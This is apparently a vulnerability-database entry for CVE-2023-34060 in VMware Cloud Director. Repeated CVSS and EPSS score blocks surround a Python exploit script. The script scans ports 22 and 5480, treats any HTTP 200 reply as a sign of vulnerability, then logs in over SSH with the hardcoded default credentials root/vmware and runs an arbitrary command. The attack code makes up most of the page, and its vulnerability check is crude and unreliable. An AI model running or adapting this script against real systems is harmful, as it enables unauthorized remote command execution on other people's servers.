9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.4 High
AI Score
Confidence
Low
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
43.2%
`# Exploit Title: [VMware Cloud Director | Bypass identity verification]
# Google Dork: [non]
# Date: [12/06/2023]
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
# Version: [10.5]
# CVE : [CVE-2023-34060]
import requests
import paramiko
import subprocess
import socket
import argparse
import threading
# Define a function to check if a port is open
def is_port_open(ip, port):
# Create a socket object
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Set the timeout to 1 second
s.settimeout(1)
# Try to connect to the port
try:
s.connect((ip, port))
# The port is open
return True
except:
# The port is closed
return False
finally:
# Close the socket
s.close()
# Define a function to exploit a vulnerable device
def exploit_device(ip, port, username, password, command):
# Create a ssh client object
client = paramiko.SSHClient()
# Set the policy to accept any host key
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Connect to the target using the credentials
client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False)
# Execute the command and get the output
stdin, stdout, stderr = client.exec_command(command)
# Print the output
print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}")
# Close the ssh connection
client.close()
# Parse the arguments from the user
parser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director")
parser.add_argument("ip", help="The target IP address")
parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check")
parser.add_argument("-u", "--username", default="root", help="The username for ssh")
parser.add_argument("-w", "--password", default="vmware", help="The password for ssh")
parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices")
args = parser.parse_args()
# Loop through the ports and check for the vulnerability
for port in args.ports:
# Check if the port is open
if is_port_open(args.ip, port):
# The port is open, send a GET request to the port and check the status code
response = requests.get(f"http://{args.ip}:{port}")
if response.status_code == 200:
# The port is open and vulnerable
print(f"Port {port} is vulnerable to CVE-2023-34060")
# Create a thread to exploit the device
thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command))
# Start the thread
thread.start()
else:
# The port is open but not vulnerable
print(f"Port {port} is not vulnerable to CVE-2023-34060")
else:
# The port is closed
print(f"Port {port} is closed")
`
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.4 High
AI Score
Confidence
Low
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
43.2%